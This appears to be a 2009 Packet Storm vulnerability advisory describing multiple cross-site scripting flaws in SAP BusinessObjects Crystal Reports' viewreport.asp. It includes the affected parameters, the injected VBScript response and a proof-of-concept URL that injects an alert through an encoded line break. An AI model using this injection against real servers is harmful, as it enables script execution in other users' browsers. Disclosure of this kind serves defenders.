what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Crystal Reports Cross Site Scripting

Crystal Reports Cross Site Scripting
Posted Apr 2, 2009
Authored by BugsNotHugs

SAP BusinessObjects Crystal Reports suffers from multiple cross site scripting vulnerabilities in viewreport.asp.

tags | exploit, vulnerability, xss, asp
SHA-256 | fce3185bc71a241e9920ff0d2d40f556e07582a6a9c248380cf2b345f436b30e

Crystal Reports Cross Site Scripting

Change Mirror Download
- SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS

- Description

Cross-site scripting; vbscript rather than javascript. Subsequent page
will contain pop up reading "fsck_cissp". ID, PROMPTEX-SESSION_ID,
PROMPTEX-TO_DATE, PROMPTEX-FROM_DATE, PROMPTEX-YEAR_QTR1,
PROMPTEX-YEAR_QTR2, PROMPTEX-YEAR_QTR3, PROMPTEX-YEAR_QTR4,
PROMPTEX-YEAR_QTR5, PROMPTEX-YEAR_QTR6, PROMPTEX-YEAR_QTR7,
PROMPTEX-YEAR_QTR8, and PROMPTEX-QT parameters affected.

The following is the response:

<SCRIPT LANGUAGE="VBScript">
<!--

Sub window_onLoad()
Page_Initialize()
End Sub

Sub Page_Initialize
On Error Resume Next
Dim webBroker
Set webBroker = CreateObject("CrystalReports11.WebReportBroker.1")
if err.number <> 0 then
window.alert "The Crystal ActiveX Viewer is unable to
create it's resource objects."
CRViewer.ReportName =
"HTTPS://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777
<HTTPS://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777>
"
window.alert "fsck_cissp"
else
Dim webSource0
Set webSource0 =
CreateObject("CrystalReports11.WebReportSource.1")
webSource0.ReportSource = webBroker
webSource0.URL =
"HTTPS://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777
<HTTPS://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777>
"
window.alert "fsck_cissp"
webSource0.PromptOnRefresh = True


CRViewer.ReportSource = webSource0
end if
CRViewer.ViewReport
End Sub

-->
</SCRIPT>

- Product

SAP BusinessObjects, Crystal Reports, unknown

- PoC

https://66.240.213.81/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect

- Solution

None

- Timeline

2008-01-23: Vulnerability discovered
2008-02-15: Vendor contact methods unacceptable (paying customers only)

--
BugsNotHugs
Shared Vulnerability Disclosure Account

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close